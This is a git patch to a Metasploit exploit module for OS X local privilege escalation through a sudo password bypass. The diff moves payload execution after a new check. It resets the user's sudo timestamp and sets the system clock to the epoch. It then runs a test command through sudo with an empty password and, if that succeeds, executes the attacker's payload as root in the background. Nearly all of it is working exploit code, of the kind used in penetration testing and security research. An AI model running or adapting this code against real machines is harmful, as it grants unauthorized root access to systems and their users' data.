From 3ce23ffb49cd30f944e85ac493c28198e8cbad98 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Sat, 24 Aug 2013 11:20:47 -0500
Subject: [PATCH] Make a test before running the payload

---
 .../osx/local/sudo_password_bypass.rb         | 41 +++++++++++++------
 1 file changed, 28 insertions(+), 13 deletions(-)

diff --git a/modules/exploits/osx/local/sudo_password_bypass.rb b/modules/exploits/osx/local/sudo_password_bypass.rb
index 47d4b5382f..e7468097bd 100644
--- a/modules/exploits/osx/local/sudo_password_bypass.rb
+++ b/modules/exploits/osx/local/sudo_password_bypass.rb
@@ -160,14 +160,6 @@ class Metasploit3 < Msf::Exploit::Local
 	private
 
 	def run_sudo_cmd
-		sudo_cmd_raw = if using_native_target?
-			['sudo', '-S', [drop_path].shelljoin].join(' ')
-		elsif using_cmd_target?
-			['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')
-		end
-
-		## to prevent the password prompt from destroying session
-		sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & true'
 
 		print_status("Resetting user's time stamp file and setting clock to the epoch")
 		cmd_exec(
@@ -176,14 +168,37 @@ class Metasploit3 < Msf::Exploit::Local
 			" -setdate 01:01:1970 -settime 00:00"
 		)
 
+		# Run Test
+		test = rand_text_alpha(4 + rand(4))
+		sudo_cmd_test = ['sudo', '-S', ["echo #{test}"].shelljoin].join(' ')
+
+		print_status("Executing test...")
+		output = cmd_exec('echo "" | ' + sudo_cmd_test)
+
+		if output =~ /incorrect password attempts\s*$/i
+			fail_with(Exploit::Failure::NotFound, "User has never run sudo, and is therefore not vulnerable. Bailing.")
+		elsif output =~ /#{test}/
+			print_good("Test executed succesfully. Running payload.")
+		else
+			print_error("Unknown fail while testing, trying to execute the payload anyway...")
+		end
+
+
+		# Run Payload
+		sudo_cmd_raw = if using_native_target?
+			['sudo', '-S', [drop_path].shelljoin].join(' ')
+		elsif using_cmd_target?
+			['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')
+		end
+
+		## to prevent the password prompt from destroying session
+		## backgrounding the sudo payload in order to keep both sessions usable
+		sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & true'
+
 		print_status "Running command: "
 		print_line sudo_cmd
 		output = cmd_exec(sudo_cmd)
-		if output =~ /incorrect password attempts\s*$/i
-			fail_with(Exploit::Failure::NotFound,
-				"User has never run sudo, and is therefore not vulnerable. Bailing.")
-		end
-		#print_good output
+
 	end
 
 	# cmd_exec doesn't allow to get a session, so there is no way to make the cleanup